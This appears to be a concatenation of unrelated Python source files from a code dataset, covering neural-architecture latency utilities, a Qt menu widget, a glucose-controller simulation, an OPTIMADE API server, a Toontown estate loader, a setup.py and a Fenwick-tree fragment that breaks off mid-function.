content
stringlengths 5
1.05M
|
|---|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
# Ravi Krishna 07/25/21
# LR step function based heavily on existing
# PyTorch implementations of LR schedulers,
# and specifically _LRScheduler and LambdaLR.
# Import statements.
import torch
import torch.optim
import timeit
# Constants.
STR_TO_OPTIM = {"sgd" : torch.optim.SGD,
"adam" : torch.optim.Adam,
"adagrad" : torch.optim.Adagrad}
KAGGLE_DAYS = 7
class Timer:
level = 0
def __init__(self, name):
self.name = name
def __enter__(self):
self.start = timeit.default_timer()
Timer.level += 1
def __exit__(self, *a, **kw):
Timer.level -= 1
print(
f'{" " * Timer.level}{self.name} took {timeit.default_timer() - self.start} sec')
def vectors_sum(vecs):
"""
Sum vectors in a list.
"""
cat_vecs = torch.cat(vecs, -1)
cat_vecs_2d = torch.reshape(cat_vecs, (len(vecs), vecs[0].size()[0]))
vecs_sum = torch.sum(cat_vecs_2d, axis=0)
return vecs_sum
def calculate_latency_efficient(mask_vals,
indices_look_up_table,
latency_table_ms,
num_s_net_layers,
fc_sizes_list,
input_dim,
output_dim):
"""
Calculates the overall super net latency
(across each input in the batch).
"""
# Store the total latency as a vector of
# dim batch_size. We can get
# batch_size from the dim of the mask values.
curr_batch_s = list(mask_vals[0][0].size())[0]
layer_latencies = []
# We need to store the input size probs
# for the next layer as we go through the super
# net (next layer means that one we just
# calculated the latency for, not the one we are
# going to calculate the latency for next).
next_input_probs = torch.ones(curr_batch_s, 1).to(latency_table_ms.device)
# Calculate the latency for each layer in the
# super net, starting from the last layer.
for layer_ix in range(num_s_net_layers - 1, -1, -1):
# Calculate latency for each output size
# and then take weighted sum with the
# output size probs.
curr_layer_latencies = []
if layer_ix != (num_s_net_layers - 1):
fc_sizes_use = fc_sizes_list
else:
fc_sizes_use = [output_dim]
for o_size_ix, curr_o_size in enumerate(fc_sizes_use):
# Store the latency for all of the operators in
# this layer with the output size curr_o_size.
curr_o_size_latencies = []
if layer_ix != 0:
fc_sizes_use_i = fc_sizes_list
else:
fc_sizes_use_i = [input_dim]
for i_size_ix, curr_i_size in enumerate(fc_sizes_use_i):
# Calculate the latency for this operator.
# Get the string corresponding to this FC op.
look_up_str = f"fc_{curr_i_size}_{curr_o_size}"
# Get the index of the look-up table corresponding
# to the operator string.
curr_op_latency_table_index = indices_look_up_table[look_up_str]
# Get the latency from the latency table at that index.
curr_op_latency = latency_table_ms[curr_op_latency_table_index]
# Get the probs for this layer.
curr_op_probs = mask_vals[layer_ix][o_size_ix][:, i_size_ix]
# Add to curr_o_size_latency.
curr_o_size_latencies.append(curr_op_latency * curr_op_probs)
# Now get the probs for this output size.
# next_input_probs is of size (batch_size, num_input_sizes_for_next_layer).
curr_o_size_probs = next_input_probs[:, o_size_ix]
# Sum the curr_o_size_latencies.
curr_o_size_latency = vectors_sum(curr_o_size_latencies)
# Add the weighted latency to the overall latency of this layer.
weighted_latency = torch.mul(curr_o_size_latency, curr_o_size_probs)
curr_layer_latencies.append(weighted_latency)
# Update next_input_probs.
# If layer_ix is 0, this will not matter anyway.
old_next_input_probs = next_input_probs
# Input and output sizes.
if layer_ix != 0:
curr_i_sizes = fc_sizes_list
else:
curr_i_sizes = [input_dim]
if layer_ix != (num_s_net_layers - 1):
curr_o_sizes = fc_sizes_list
else:
curr_o_sizes = [output_dim]
# Input probabilities.
table_device = latency_table_ms.device
zero_vector = [0.00] * len(curr_i_sizes)
next_input_probs = torch.zeros(curr_batch_s, len(curr_i_sizes)).to(table_device)
for curr_i_size_ix, _curr_i_size in enumerate(curr_i_sizes):
# The probability that we will use this input size
# is the sum of the probs that we will use any
# of its output sizes times the correct probs.
curr_i_size_probs_list = []
for curr_o_size_ix, _curr_o_size in enumerate(curr_o_sizes):
# Mask values.
curr_mask_vals = mask_vals[layer_ix][curr_o_size_ix][:, curr_i_size_ix]
# Old input probs.
curr_old_next_probs = old_next_input_probs[:, curr_o_size_ix]
# Probabilities.
curr_probs = torch.mul(curr_mask_vals, curr_old_next_probs)
curr_i_size_probs_list.append(curr_probs)
# Sum curr_i_size_probs_list to get curr_i_size_probs.
curr_i_size_probs = vectors_sum(curr_i_size_probs_list)
# Set the correct values in next_input_probs to curr_i_size_probs.
next_input_probs[:, curr_i_size_ix] = curr_i_size_probs
# Sum the curr_layer_latencies to get current_layer_latency.
current_layer_latency = vectors_sum(curr_layer_latencies)
# Add the latency for the current layer to the overall super net latency.
layer_latencies.append(current_layer_latency)
# Calculate the total latency as the sum of each layer's latency.
total_latency = vectors_sum(layer_latencies)
# Return the total latency.
return total_latency
# Adjusts optimizer learning rate.
def step_lambda_lr(optimizer,
lr_lambdas,
current_epoch,
initial_optimizer_lrs):
# Iterate through each parameter group
# in the optimizer, as well as the
# lambda and the original LR.
lists_zip_obj = zip(optimizer.param_groups, lr_lambdas, initial_optimizer_lrs)
for param_group, lr_lambda, initial_lr in lists_zip_obj:
param_group["lr"] = lr_lambda(current_epoch) * initial_lr
# Add a return statement for clarity.
return
def arch_sampling_str_to_dict(sampling_str):
"""
Converts string representations of architecutre
sampling methodology to the dictionary format
that nas_searchmanager.SearchManager uses.
Example:
\"1:4,2:4,3:4,4:4\" is converted to
{1.0 : 4, 2.0 : 4, 3.0 : 4, 4.0 : 4}.
"""
# Remove any spaces that the user may have
# entered into the string representation.
sampling_str = sampling_str.replace(" ", "")
# Split by comma to get the architectures sampled
# at each number of architecture parameters epochs
# completed.
archs_sampled_list = sampling_str.split(",")
# Convert the list of epoch:num_archs_to_sample
# strings to the correct dictionary format.
arch_sampling_dict = {}
for curr_arch_sampling in archs_sampled_list:
# Split by colon.
[num_epochs_elapsed, num_archs_to_sample] = curr_arch_sampling.split(":")
# Add to dictionary.
arch_sampling_dict[float(num_epochs_elapsed)] = int(num_archs_to_sample)
# Return the dictionary.
return arch_sampling_dict
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################
# Author: Mu yanru
# Date : 2019.3
# Email : muyanru345@163.com
###################################################################
"""A Navigation menu"""
# Import future modules
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Import third-party modules
from Qt import QtCore
from Qt import QtWidgets
# Import local modules
from dayu_widgets import dayu_theme
from dayu_widgets.button_group import MButtonGroupBase
from dayu_widgets.divider import MDivider
from dayu_widgets.tool_button import MToolButton
class MBlockButton(MToolButton):
"""MBlockButton"""
def __init__(self, parent=None):
super(MBlockButton, self).__init__(parent)
self.setCheckable(True)
class MBlockButtonGroup(MButtonGroupBase):
"""MBlockButtonGroup"""
sig_checked_changed = QtCore.Signal(int)
def __init__(self, tab, orientation=QtCore.Qt.Horizontal, parent=None):
super(MBlockButtonGroup, self).__init__(orientation=orientation, parent=parent)
self.set_spacing(1)
self._menu_tab = tab
self._button_group.setExclusive(True)
self._button_group.buttonClicked[int].connect(self.sig_checked_changed)
def create_button(self, data_dict):
button = MBlockButton()
if data_dict.get("svg"):
button.svg(data_dict.get("svg"))
if data_dict.get("text"):
if data_dict.get("svg") or data_dict.get("icon"):
button.text_beside_icon()
else:
button.text_only()
else:
button.icon_only()
button.set_dayu_size(self._menu_tab.get_dayu_size())
return button
def update_size(self, size):
for button in self._button_group.buttons():
button.set_dayu_size(size)
def set_dayu_checked(self, value):
"""Set current checked button's id"""
button = self._button_group.button(value)
button.setChecked(True)
self.sig_checked_changed.emit(value)
def get_dayu_checked(self):
"""Get current checked button's id"""
return self._button_group.checkedId()
dayu_checked = QtCore.Property(
int, get_dayu_checked, set_dayu_checked, notify=sig_checked_changed
)
class MMenuTabWidget(QtWidgets.QWidget):
"""MMenuTabWidget"""
def __init__(self, orientation=QtCore.Qt.Horizontal, parent=None):
super(MMenuTabWidget, self).__init__(parent=parent)
self.tool_button_group = MBlockButtonGroup(tab=self, orientation=orientation)
if orientation == QtCore.Qt.Horizontal:
self._bar_layout = QtWidgets.QHBoxLayout()
self._bar_layout.setContentsMargins(10, 0, 10, 0)
else:
self._bar_layout = QtWidgets.QVBoxLayout()
self._bar_layout.setContentsMargins(0, 0, 0, 0)
self._bar_layout.addWidget(self.tool_button_group)
self._bar_layout.addStretch()
bar_widget = QtWidgets.QWidget()
bar_widget.setObjectName("bar_widget")
bar_widget.setLayout(self._bar_layout)
bar_widget.setAttribute(QtCore.Qt.WA_StyledBackground)
main_lay = QtWidgets.QVBoxLayout()
main_lay.setContentsMargins(0, 0, 0, 0)
main_lay.setSpacing(0)
main_lay.addWidget(bar_widget)
if orientation == QtCore.Qt.Horizontal:
main_lay.addWidget(MDivider())
main_lay.addSpacing(5)
self.setLayout(main_lay)
self._dayu_size = dayu_theme.large
def tool_bar_append_widget(self, widget):
"""Add the widget too menubar's right position."""
self._bar_layout.addWidget(widget)
def tool_bar_insert_widget(self, widget):
"""Insert the widget to menubar's left position."""
self._bar_layout.insertWidget(0, widget)
def add_menu(self, data_dict, index=None):
"""Add a menu"""
self.tool_button_group.add_button(data_dict, index)
def get_dayu_size(self):
"""
Get the menu tab size.
:return: integer
"""
return self._dayu_size
def set_dayu_size(self, value):
"""
Set the menu tab size.
:param value: integer
:return: None
"""
self._dayu_size = value
self.tool_button_group.update_size(self._dayu_size)
self.style().polish(self)
dayu_size = QtCore.Property(int, get_dayu_size, set_dayu_size)
|
# coding: utf-8
import glob
import numpy as np
preds = [np.loadtxt(name) for name in glob.glob('*.pred')]
np.testing.assert_array_almost_equal(preds[0], preds[1], decimal=5)
|
import numpy as np
from pyDOE import lhs
#from simulation1Day import simulation, hypoGlicemia, hyperGlicemia, pidC1
from scipy.integrate import odeint
import matplotlib.pyplot as plt
# to use java in python you need to specify the path where is Java
import os
os.environ['JAVA_HOME'] = "/Library/Java/JavaVirtualMachines/jdk-11.0.8.jdk/Contents/Home"
from moonlight import *
# importing the model, the simulation function
from pancreasModel import modelPID, simulation
# setting the k_i parameters
Kd = [0, -0.0602, -0.0573, -0.06002, -0.0624]
Ki = [0, -3.53e-07, -3e-07, -1.17e-07, -7.55e-07]
Kp = [0, -6.17e-04, -6.39e-04, -6.76e-04, -5.42e-04]
pidC1 = lambda x, t: modelPID(x, t, Kp[1], Ki[1], Kd[1])
pidC2 = lambda x, t: modelPID(x, t, Kp[2], Ki[2], Kd[2])
pidC3 = lambda x, t: modelPID(x, t, Kp[3], Ki[3], Kd[3])
pidC4 = lambda x, t: modelPID(x, t, Kp[4], Ki[4], Kd[4])
pidC1Noise = lambda x, t: modelPID(x, t, Kp[1], Ki[1], Kd[1])
# defining the control parameters
t_meal1 = np.random.normal(300, 60)
t_meal2 = np.random.normal(300, 60)
t_meal3 = 1440 - t_meal1 - t_meal2
dg1 = np.random.normal(40, 10)
dg2 = np.random.normal(90, 10)
dg3 = np.random.normal(60, 10)
# trying to vary oid constant pidC_i
t, y = simulation([t_meal1, t_meal2, t_meal3], [dg1, dg2, dg3], pidC2)
y = y[:,0];
# plot results
thresholdUp = 180;
thresholdDown = 70;
plt.fill_between([t[0],t[-1]], [4,4],[max(y),max(y)],alpha=0.5)
plt.plot(t,y,'r-',linewidth=2)
plt.axhline(y=thresholdUp, color='k', linestyle='-')
plt.axhline(y=thresholdDown, color='k', linestyle='-')
plt.xlabel('Time (min)')
plt.ylabel('BG (mmol/L)')
plt.show()
# defining the properties
script = """
signal {real y;}
domain minmax;
formula hypoGlicemia = globally [0.0, 1400] (y > 70);
formula hyperGlicemia = globally [0.0, 1400] (y < 180);
"""
moonlightScript = ScriptLoader.loadFromText(script)
# monitoring the properties
monitor = moonlightScript.getMonitor("hypoGlicemia")
y_signal = [[yy] for yy in y]
result = monitor.monitor(list(t),y_signal)
print('robustness:'+ str(result[0][1])) # robustness at time zero
# noise model
y_noise = [yy+ np.random.normal(0, 5) for yy in y]
plt.fill_between([t[0],t[-1]], [4,4],[max(y_noise),max(y_noise)],alpha=0.5)
plt.plot(t,y_noise,'r-',linewidth=2)
plt.axhline(y=thresholdUp, color='k', linestyle='-')
plt.axhline(y=thresholdDown, color='k', linestyle='-')
plt.xlabel('Time (min)')
plt.ylabel('BG (mmol/L)')
plt.show()
#falsification
def findMinimum(pid, N):
minSTL = float('Inf')
vRob = float('Inf')
for i in range(N):
t_meal1 = np.random.normal(300, 60)
t_meal2 = np.random.normal(300, 60)
t_meal3 = 1440 - t_meal1 - t_meal2
dg1 = np.random.normal(40, 10)
dg2 = np.random.normal(90, 10)
dg3 = np.random.normal(60, 10)
t, y = simulation([t_meal1, t_meal2, t_meal3], [dg1, dg2, dg3], pid)
y = y[:, 0]
y_signal = [[yy] for yy in y]
result = monitor.monitor(list(t),y_signal)
stl = result[0][1]
if (stl < minSTL):
minSTL = stl
vSTL = [t_meal1, t_meal2, t_meal3, dg1, dg2, dg3]
print(i)
print('minSTL parameter: ' + str(vSTL))
print('minSTL: ' + str(minSTL))
N = 10;
findMinimum(pidC2, N)
|
# pylint: disable=line-too-long
import json
from lark.exceptions import VisitError
from pydantic import ValidationError
from fastapi import FastAPI
from fastapi.exceptions import RequestValidationError, StarletteHTTPException
from fastapi.middleware.cors import CORSMiddleware
from optimade import __api_version__, __version__
import optimade.server.exception_handlers as exc_handlers
from .config import CONFIG
from .middleware import EnsureQueryParamIntegrity
from .routers import index_info, links
from .routers.utils import BASE_URL_PREFIXES
if CONFIG.debug: # pragma: no cover
print("DEBUG MODE")
app = FastAPI(
title="OPTIMADE API - Index meta-database",
description=(
f"""The [Open Databases Integration for Materials Design (OPTIMADE) consortium](https://www.optimade.org/) aims to make materials databases interoperational by developing a common REST API.
This is the "special" index meta-database.
This specification is generated using [`optimade-python-tools`](https://github.com/Materials-Consortia/optimade-python-tools/tree/v{__version__}) v{__version__}."""
),
version=__api_version__,
docs_url=f"{BASE_URL_PREFIXES['major']}/extensions/docs",
redoc_url=f"{BASE_URL_PREFIXES['major']}/extensions/redoc",
openapi_url=f"{BASE_URL_PREFIXES['major']}/extensions/openapi.json",
)
if not CONFIG.use_real_mongo and CONFIG.index_links_path.exists():
import bson.json_util
from .routers.links import links_coll
from .routers.utils import mongo_id_for_database
print("loading index links...")
with open(CONFIG.index_links_path) as f:
data = json.load(f)
processed = []
for db in data:
db["_id"] = {"$oid": mongo_id_for_database(db["id"], db["type"])}
processed.append(db)
print("inserting index links into collection...")
links_coll.collection.insert_many(
bson.json_util.loads(bson.json_util.dumps(processed))
)
print("done inserting index links...")
# Add various middleware
app.add_middleware(CORSMiddleware, allow_origins=["*"])
app.add_middleware(EnsureQueryParamIntegrity)
# Add various exception handlers
app.add_exception_handler(StarletteHTTPException, exc_handlers.http_exception_handler)
app.add_exception_handler(
RequestValidationError, exc_handlers.request_validation_exception_handler
)
app.add_exception_handler(ValidationError, exc_handlers.validation_exception_handler)
app.add_exception_handler(VisitError, exc_handlers.grammar_not_implemented_handler)
app.add_exception_handler(Exception, exc_handlers.general_exception_handler)
# Add various endpoints to `/vMAJOR`
app.include_router(index_info.router, prefix=BASE_URL_PREFIXES["major"])
app.include_router(links.router, prefix=BASE_URL_PREFIXES["major"])
def add_optional_versioned_base_urls(app: FastAPI):
"""Add the following OPTIONAL prefixes/base URLs to server:
```
/vMajor.Minor
/vMajor.Minor.Patch
```
"""
for version in ("minor", "patch"):
app.include_router(index_info.router, prefix=BASE_URL_PREFIXES[version])
app.include_router(links.router, prefix=BASE_URL_PREFIXES[version])
@app.on_event("startup")
async def startup_event():
# Add API endpoints for OPTIONAL base URLs `/vMAJOR.MINOR` and `/vMAJOR.MINOR.PATCH`
add_optional_versioned_base_urls(app)
|
from pandac.PandaModules import *
from toontown.toonbase.ToontownGlobals import *
from direct.interval.IntervalGlobal import *
from direct.fsm import ClassicFSM, State
from toontown.safezone import SafeZoneLoader
import random
from toontown.launcher import DownloadForceAcknowledge
import House
import Estate
import HouseGlobals
import random
import math
from toontown.coghq import MovingPlatform
from direct.directnotify import DirectNotifyGlobal
class EstateLoader(SafeZoneLoader.SafeZoneLoader):
notify = DirectNotifyGlobal.directNotify.newCategory('EstateLoader')
def __init__(self, hood, parentFSM, doneEvent):
SafeZoneLoader.SafeZoneLoader.__init__(self, hood, parentFSM, doneEvent)
del self.fsm
self.fsm = ClassicFSM.ClassicFSM('EstateLoader', [State.State('start', self.enterStart, self.exitStart, ['quietZone', 'estate', 'house']),
State.State('estate', self.enterEstate, self.exitEstate, ['quietZone']),
State.State('house', self.enterHouse, self.exitHouse, ['quietZone']),
State.State('quietZone', self.enterQuietZone, self.exitQuietZone, ['house', 'estate']),
State.State('final', self.enterFinal, self.exitFinal, ['start'])], 'start', 'final')
self.musicFile = 'phase_4/audio/bgm/TC_nbrhood.mid'
self.activityMusicFile = 'phase_3.5/audio/bgm/TC_SZ_activity.mid'
self.dnaFile = 'phase_5.5/dna/estate_1.dna'
self.safeZoneStorageDNAFile = None
self.cloudSwitch = 0
self.id = MyEstate
self.estateOwnerId = None
self.branchZone = None
self.houseDoneEvent = 'houseDone'
self.estateDoneEvent = 'estateDone'
self.enteredHouse = None
self.houseNode = [None] * 6
self.houseModels = [None] * HouseGlobals.NUM_HOUSE_TYPES
self.houseId2house = {}
self.barrel = None
self.clouds = []
self.cloudTrack = None
self.sunMoonNode = None
self.fsm.enterInitialState()
return
def load(self):
SafeZoneLoader.SafeZoneLoader.load(self)
self.music = base.loadMusic('phase_4/audio/bgm/TC_nbrhood.mid')
self.underwaterSound = base.loadSfx('phase_4/audio/sfx/AV_ambient_water.mp3')
self.swimSound = base.loadSfx('phase_4/audio/sfx/AV_swim_single_stroke.mp3')
self.submergeSound = base.loadSfx('phase_5.5/audio/sfx/AV_jump_in_water.mp3')
self.birdSound = map(base.loadSfx, ['phase_4/audio/sfx/SZ_TC_bird1.mp3', 'phase_4/audio/sfx/SZ_TC_bird2.mp3', 'phase_4/audio/sfx/SZ_TC_bird3.mp3'])
self.cricketSound = map(base.loadSfx, ['phase_4/audio/sfx/SZ_TC_bird1.mp3', 'phase_4/audio/sfx/SZ_TC_bird2.mp3', 'phase_4/audio/sfx/SZ_TC_bird3.mp3'])
if base.goonsEnabled:
invModel = loader.loadModel('phase_3.5/models/gui/inventory_icons')
self.invModels = []
from toontown.toonbase import ToontownBattleGlobals
for track in range(len(ToontownBattleGlobals.AvPropsNew)):
itemList = []
for item in range(len(ToontownBattleGlobals.AvPropsNew[track])):
itemList.append(invModel.find('**/' + ToontownBattleGlobals.AvPropsNew[track][item]))
self.invModels.append(itemList)
invModel.removeNode()
del invModel
def unload(self):
self.ignoreAll()
base.cr.estateMgr.leaveEstate()
self.estateOwnerId = None
self.estateZoneId = None
if self.place:
self.place.exit()
self.place.unload()
del self.place
del self.underwaterSound
del self.swimSound
del self.submergeSound
del self.birdSound
del self.cricketSound
for node in self.houseNode:
node.removeNode()
del self.houseNode
for model in self.houseModels:
model.removeNode()
del self.houseModels
del self.houseId2house
if self.sunMoonNode:
self.sunMoonNode.removeNode()
del self.sunMoonNode
self.sunMoonNode = None
if self.clouds:
for cloud in self.clouds:
cloud[0].removeNode()
del cloud[1]
del self.clouds
if self.barrel:
self.barrel.removeNode()
SafeZoneLoader.SafeZoneLoader.unload(self)
return
def enter(self, requestStatus):
self.estateOwnerId = requestStatus.get('ownerId', base.localAvatar.doId)
base.localAvatar.inEstate = 1
self.loadCloudPlatforms()
if base.cloudPlatformsEnabled and 0:
self.setCloudSwitch(1)
if self.cloudSwitch:
self.setCloudSwitch(self.cloudSwitch)
SafeZoneLoader.SafeZoneLoader.enter(self, requestStatus)
def exit(self):
self.ignoreAll()
base.cr.cache.flush()
base.localAvatar.stopChat()
base.localAvatar.inEstate = 0
SafeZoneLoader.SafeZoneLoader.exit(self)
def createSafeZone(self, dnaFile):
SafeZoneLoader.SafeZoneLoader.createSafeZone(self, dnaFile)
self.loadHouses()
self.loadSunMoon()
def loadHouses(self):
for i in range(HouseGlobals.NUM_HOUSE_TYPES):
self.houseModels[i] = loader.loadModel(HouseGlobals.houseModels[i])
for i in range(6):
posHpr = HouseGlobals.houseDrops[i]
self.houseNode[i] = self.geom.attachNewNode('esHouse_' + str(i))
self.houseNode[i].setPosHpr(*posHpr)
def loadSunMoon(self):
self.sun = loader.loadModel('phase_4/models/props/sun.bam')
self.moon = loader.loadModel('phase_5.5/models/props/moon.bam')
self.sunMoonNode = self.geom.attachNewNode('sunMoon')
self.sunMoonNode.setPosHpr(0, 0, 0, 0, 0, 0)
if self.sun:
self.sun.reparentTo(self.sunMoonNode)
self.sun.setY(270)
self.sun.setScale(2)
self.sun.setBillboardPointEye()
if self.moon:
self.moon.setP(180)
self.moon.reparentTo(self.sunMoonNode)
self.moon.setY(-270)
self.moon.setScale(15)
self.moon.setBillboardPointEye()
self.sunMoonNode.setP(30)
def enterEstate(self, requestStatus):
self.notify.debug('enterEstate: requestStatus = %s' % requestStatus)
ownerId = requestStatus.get('ownerId')
if ownerId:
self.estateOwnerId = ownerId
zoneId = requestStatus['zoneId']
self.notify.debug('enterEstate, ownerId = %s, zoneId = %s' % (self.estateOwnerId, zoneId))
self.accept(self.estateDoneEvent, self.handleEstateDone)
self.place = Estate.Estate(self, self.estateOwnerId, zoneId, self.fsm.getStateNamed('estate'), self.estateDoneEvent)
base.cr.playGame.setPlace(self.place)
self.place.load()
self.place.enter(requestStatus)
self.estateZoneId = zoneId
def exitEstate(self):
self.notify.debug('exitEstate')
self.ignore(self.estateDoneEvent)
self.place.exit()
self.place.unload()
self.place = None
base.cr.playGame.setPlace(self.place)
base.cr.cache.flush()
return
def handleEstateDone(self, doneStatus = None):
if not doneStatus:
doneStatus = self.place.getDoneStatus()
how = doneStatus['how']
shardId = doneStatus['shardId']
hoodId = doneStatus['hoodId']
zoneId = doneStatus['zoneId']
avId = doneStatus.get('avId', -1)
ownerId = doneStatus.get('ownerId', -1)
if shardId != None or hoodId != MyEstate:
self.notify.debug('estate done, and we are backing out to a different hood/shard')
self.notify.debug('hoodId = %s, avId = %s' % (hoodId, avId))
self.doneStatus = doneStatus
messenger.send(self.doneEvent)
return
if how in ['tunnelIn',
'teleportIn',
'doorIn',
'elevatorIn']:
self.notify.debug('staying in estateloader')
self.fsm.request('quietZone', [doneStatus])
else:
self.notify.error('Exited hood with unexpected mode %s' % how)
return
def enterHouse(self, requestStatus):
ownerId = requestStatus.get('ownerId')
if ownerId:
self.estateOwnerId = ownerId
self.acceptOnce(self.houseDoneEvent, self.handleHouseDone)
self.place = House.House(self, self.estateOwnerId, self.fsm.getStateNamed('house'), self.houseDoneEvent)
base.cr.playGame.setPlace(self.place)
self.place.load()
self.place.enter(requestStatus)
def exitHouse(self):
self.ignore(self.houseDoneEvent)
self.place.exit()
self.place.unload()
self.place = None
base.cr.playGame.setPlace(self.place)
return
def handleHouseDone(self, doneStatus = None):
if not doneStatus:
doneStatus = self.place.getDoneStatus()
shardId = doneStatus['shardId']
hoodId = doneStatus['hoodId']
if shardId != None or hoodId != MyEstate:
self.doneStatus = doneStatus
messenger.send(self.doneEvent)
return
how = doneStatus['how']
if how in ['tunnelIn',
'teleportIn',
'doorIn',
'elevatorIn']:
self.fsm.request('quietZone', [doneStatus])
else:
self.notify.error('Exited hood with unexpected mode %s' % how)
return
def handleQuietZoneDone(self):
status = self.quietZoneStateData.getRequestStatus()
self.fsm.request(status['where'], [status])
def atMyEstate(self):
if self.estateOwnerId != None:
if self.estateOwnerId == base.localAvatar.getDoId():
return 1
else:
return 0
else:
self.notify.warning("We aren't in an estate")
return
def setHouse(self, houseId):
try:
houseDo = base.cr.doId2do[houseId]
self.enteredHouse = houseDo.house
except KeyError:
self.notify.debug("can't find house: %d" % houseId)
def startCloudPlatforms(self):
return
if len(self.clouds):
self.cloudTrack = self.__cloudTrack()
self.cloudTrack.loop()
def stopCloudPlatforms(self):
if self.cloudTrack:
self.cloudTrack.pause()
del self.cloudTrack
self.cloudTrack = None
return
def __cloudTrack(self):
track = Parallel()
for cloud in self.clouds:
axis = cloud[1]
pos = cloud[0].getPos(render)
newPos = pos + axis * 30
reversePos = pos - axis * 30
track.append(Sequence(LerpPosInterval(cloud[0], 10, newPos), LerpPosInterval(cloud[0], 20, reversePos), LerpPosInterval(cloud[0], 10, pos)))
return track
def debugGeom(self, decomposed):
print 'numPrimitives = %d' % decomposed.getNumPrimitives()
for primIndex in range(decomposed.getNumPrimitives()):
prim = decomposed.getPrimitive(primIndex)
print 'prim = %s' % prim
print 'isIndexed = %d' % prim.isIndexed()
print 'prim.getNumPrimitives = %d' % prim.getNumPrimitives()
for basicPrim in range(prim.getNumPrimitives()):
print '%d start=%d' % (basicPrim, prim.getPrimitiveStart(basicPrim))
print '%d end=%d' % (basicPrim, prim.getPrimitiveEnd(basicPrim))
def loadOnePlatform(self, version, radius, zOffset, score, multiplier):
self.notify.debug('loadOnePlatform version=%d' % version)
cloud = NodePath('cloud-%d-%d' % (score, multiplier))
cloudModel = loader.loadModel('phase_5.5/models/estate/bumper_cloud')
cc = cloudModel.copyTo(cloud)
colCube = cc.find('**/collision')
colCube.setName('cloudSphere-0')
dTheta = 2.0 * math.pi / self.numClouds
cloud.reparentTo(self.cloudOrigin)
axes = [Vec3(1, 0, 0), Vec3(0, 1, 0), Vec3(0, 0, 1)]
cloud.setPos(radius * math.cos(version * dTheta), radius * math.sin(version * dTheta), 4 * random.random() + zOffset)
cloud.setScale(4.0)
self.clouds.append([cloud, random.choice(axes)])
def loadSkyCollision(self):
plane = CollisionPlane(Plane(Vec3(0, 0, -1), Point3(0, 0, 300)))
plane.setTangible(0)
planeNode = CollisionNode('cloudSphere-0')
planeNode.addSolid(plane)
self.cloudOrigin.attachNewNode(planeNode)
def loadCloudPlatforms(self):
self.cloudOrigin = self.geom.attachNewNode('cloudOrigin')
self.cloudOrigin.setZ(30)
self.loadSkyCollision()
self.numClouds = 12
pinballScore = PinballScoring[PinballCloudBumperLow]
for i in range(12):
self.loadOnePlatform(i, 40, 0, pinballScore[0], pinballScore[1])
pinballScore = PinballScoring[PinballCloudBumperMed]
for i in range(12):
self.loadOnePlatform(i, 60, 40, pinballScore[0], pinballScore[1])
pinballScore = PinballScoring[PinballCloudBumperHigh]
for i in range(12):
self.loadOnePlatform(i, 20, 80, pinballScore[0], pinballScore[1])
self.cloudOrigin.stash()
def setCloudSwitch(self, on):
self.cloudSwitch = on
if hasattr(self, 'cloudOrigin'):
if on:
self.cloudOrigin.unstash()
else:
self.cloudOrigin.stash()
|
from subprocess import PIPE, Popen
def cmdline(command):
process = Popen(
args=command,
stdout=PIPE,
shell=True
)
return process.communicate()[0]
def subset(mydict, func):
return dict((key, mydict[key]) for key in mydict if func(mydict[key]))
|
"""
Dependencies
- User
- Threat
"""
from .user import is_user_admin, get_current_user
__all__ = [
"is_user_admin",
"get_current_user"
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import os
import re
APP = 'pypolona'
CLI = 'ppolona'
readme_file = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'README.md')
with open(readme_file) as f:
readme = f.read()
def get_version(*args):
ver = "undefined"
import pypolona.__init__
try:
ver = pypolona.__init__.__version__
except AttributeError:
verstrline = open(os.path.join(APP, '__init__.py'), "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
ver = mo.group(1)
return ver
def get_requirements(*args):
"""Get requirements from pip requirement files."""
requirements = set()
with open(get_absolute_path(*args)) as handle:
for line in handle:
# Strip comments.
line = re.sub(r'^#.*|\s#.*', '', line)
# Add git handles
line = re.sub(r'git\+(.*?)@(.*?)#egg=([^\-]+)($|([\-]?.*))', r'\3 @ git+\1@\2#egg=\3\4', line)
# Ignore empty lines
if line and not line.isspace():
requirements.add(re.sub(r'\s+', '', line))
print(requirements)
return sorted(requirements)
def get_absolute_path(*args):
"""Transform relative pathnames into absolute pathnames."""
directory = os.path.dirname(os.path.abspath(__file__))
return os.path.join(directory, *args)
setup(
name=APP,
author='Adam Twardoch',
author_email='adam+github@twardoch.com',
url='https://twardoch.github.io/%s/' % APP,
project_urls={
'Source': "https://github.com/twardoch/%s" % APP
},
version=get_version(),
license="MIT",
description="Image downloader for the polona.pl website of the Polish National Library",
long_description=readme,
long_description_content_type='text/markdown',
python_requires='>=3.9',
install_requires=get_requirements('requirements.txt'),
extras_require={
'dev': [
'twine>=3.4.1',
'pyinstaller>=4.2',
'dmgbuild>=1.4.2; sys_platform == "darwin"'
]
},
packages=find_packages(),
classifiers=[
'Environment :: Console',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.9',
],
keywords='polona jpeg downloader cli',
entry_points='''
[console_scripts]
%(cli)s=%(name)s.__main__:main
''' % {cli: CLI, name: APP}
)
|
from expdir_monitor.expdir_monitor import ExpdirMonitor
import argparse
"""
Given a expdir, run the exp
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--test', action='store_true',
help='Test model for required dataset if pretrained model exists.'
)
parser.add_argument(
'--valid', action='store_true',
)
parser.add_argument(
'--valid_size', type=int, default=-1,
)
parser.add_argument('--path', type=str)
parser.add_argument('--restore', action='store_true')
args = parser.parse_args()
expdir_monitor = ExpdirMonitor(args.path)
test_performance = expdir_monitor.run(pure=False, restore=args.restore, test=args.test, valid=args.valid,
valid_size=args.valid_size)
if args.valid:
print('validation performance: %s' % test_performance)
else:
print('test performance: %s' % test_performance)
|
import typing
def get_mx(
bit: typing.List[int],
i: int,
) -> int:
mx = -(1 << 50)
while i > 0:
mx = max(mx, bit[i])
i -= i & -i
return mx
def set_val(
bit: typing.List[int],
i: int,
x: int,
) -> typing.NoReturn:
while i < len(bit):
bit[i] = max(bit[i], x)
i += i & -i
def solve(
n: int,
h: typing.List[int],
a: typing.List[int],
